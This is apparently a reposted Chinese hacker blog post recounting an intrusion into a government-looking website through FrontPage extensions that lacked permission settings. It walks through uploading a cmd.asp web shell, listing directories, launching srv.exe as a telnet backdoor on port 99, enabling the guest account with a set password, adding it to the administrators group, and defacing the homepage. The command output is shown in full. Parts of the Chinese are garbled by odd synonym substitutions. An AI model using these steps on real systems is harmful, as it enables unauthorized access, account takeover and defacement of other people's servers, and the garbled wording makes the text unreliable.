Frontpage扩展无权限设置入侵取得admin

  晚上从网上上去，喝了杯咖啡。。。。倒，惨了。忘了咖啡是提神用的，这下好了。。睡不下了，只好开启pc，连上肉鸡看看扫到了些什么了，
  效果：一大堆的sql弱口令和大堆的U，，看看有什麽好玩的。。。。。。。。。“某某当局网站”，好，就这个。看看，原来是Frontpage无权限设置啊，我喜欢，，西西。。。连上肉鸡。。取出珍藏的cmd.asp，吹吹上面的灰尘，咳咳咳。。。
  说说这个毛病的来历吧，office中的acces范例的数据库上传到服务器上，运行的话，需要服务器上有Frontpage扩展支持。才可以运行，包括Frontpage的计数器等等一些功能都需要着扩展的支持。而此中一项就是可以长途办理网页目录的功能，这项功能在安置Frontpage扩展后也就是主动运行了，但似乎不会提醒办理员添加暗码（晓得的那位大虾背面帖一下），以是这个毛病地道是设置装备摆设不妥造成的。
  肉鸡上：打开‘网络邻人’-‘添加网上邻人’-输出ip(款式http://ip)-next下去。
  出来了，欢呼吧！！这就是对方的首页文件夹了，看到里面的文件了吗？（没看到？那不关我的事，这应该是属于眼科医生的使命）然后把cmd.asp拷贝到该web文件夹中。打开ie,输http://ip/cmd.asp。ok,出现指令运行框了。谁人run就是运行的意思（台下一大堆烂茄子飞了上来。。。。噼哩啪啦。。）
  输出：dir c:\index.* /s 确定对方主页的目录
  驱动器 C 中的卷没有标签。
  卷的序列号是 702C-518C
  c:\Program Files\Microsoft SQL Server\80\Tools\HTML 的目录
  2000-04-28 00:33 96 index.gif
  1 个文件 96 字节
  c:\WINNT\amcdl\cache 的目录
  2002-04-19 15:43 149 index.chc
  1 个文件 149 字节
  c:\WINNT\Cookies 的目录
  2001-10-09 10:35 32,768 index.dat
  1 个文件 32,768 字节
  c:\WINNT\Help\iisHelp\iis\misc 的目录
  1999-12-16 16:44 2,564 index.asp
  1999-11-04 16:45 951 index.gif
  1999-12-16 16:44 1,230 index.htm
  3 个文件 4,745 字节
  c:\WINNT\History\History.IE5 的目录
  2001-10-09 10:35 49,152 index.dat
  1 个文件 49,152 字节
  c:\WINNT\Temporary Internet Files\Content.IE5 的目录
  2001-10-09 10:43 180,224 index.dat
  1 个文件 180,224 字节
  列出全部文件:
  8 个文件 267,134 字节
  0 个目录 2,757,844,992 可用字节
  看看，到他首页，看到它的首页文件名为index.swf看来不是这里。。看看其他的盘。。
  dir d:\index.* /s
  d:\nei 的目录
  2002-04-28 09:33 6,189 index.htm
  1 个文件 6,189 字节
  d:\wai 的目录
  2002-03-19 10:40 913 index.htm
  1 个文件 913 字节
  d:\wai\asp 的目录
  2002-04-18 14:56 20,242 index.html
  1 个文件 20,242 字节
  d:\wai\asp\admin 的目录
  2001-05-20 18:12 391 index.asp
  1 个文件 391 字节
  d:\xxssj 的目录
  2002-04-22 14:37 2,490 index.asp
  1 个文件 2,490 字节
  d:\xxssj\swf 的目录
  2002-04-22 14:37 32,102 index.swf
  1 个文件 32,102 字节
  d:\xxssj\swf\_vti_cnf 的目录
  2002-04-16 15:27 221 index.swf
  1 个文件 221 字节
  d:\xxssj\_vti_cnf 的目录
  2002-04-22 14:37 1,133 index.asp
  1 个文件 1,133 字节
  列出全部文件:
  8 个文件 63,681 字节
  0 个目录 10,368,991,232 可用字节
  看到了吗？红色的就是首页目录和首页文件了，d:\xxssj和index.swf,ok!拷贝srv.exe,复制到刚才谁人web文件夹中。然后在下令运行框中打入 d:\xxssj\srv.exe (这里要注意的是，当你打完下令后按下回车，ie进度条在动的时候就可以telnet ip 99了）
  然后：net user guest /active:yes (解禁guest )
  net user guest 1314 (设置guest的暗码1314）
  net localgroup administrators guest /add （将guest参加到admin组）
  ok,现在已经取得了admin了。接上去该干什麽呢？换它的首页？？？还是…………delete给他点教训？？不过我看了内部的设置装备摆设后就打消了这个主意了。由于其内部的设置装备摆设相称的美满，这毛病地道是由于疏忽造成的。可以明白，人非圣贤嘛！
  ok,就在他首页上写上几句话，提醒他一下好了。
  “嘿嘿，欠美意思。。我改了你首页，你的网站中存在着一些人为设置装备摆设的错误。尽快修正吧……呵呵！！”
  http://ziyoutongmeng.51.net
  2002.4.23 半夜 幻影
  实在本来还想在上面写上曩昔每每跟朋侪改页时候用的一句话“我不黑你，谁黑你”。呵呵，不事后来想想，还是算了。瞌睡虫上来了，去睡觉了。来日诰日还要半期考呢…………各位，good evening!!!
  有什麽错误，欢迎指证。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：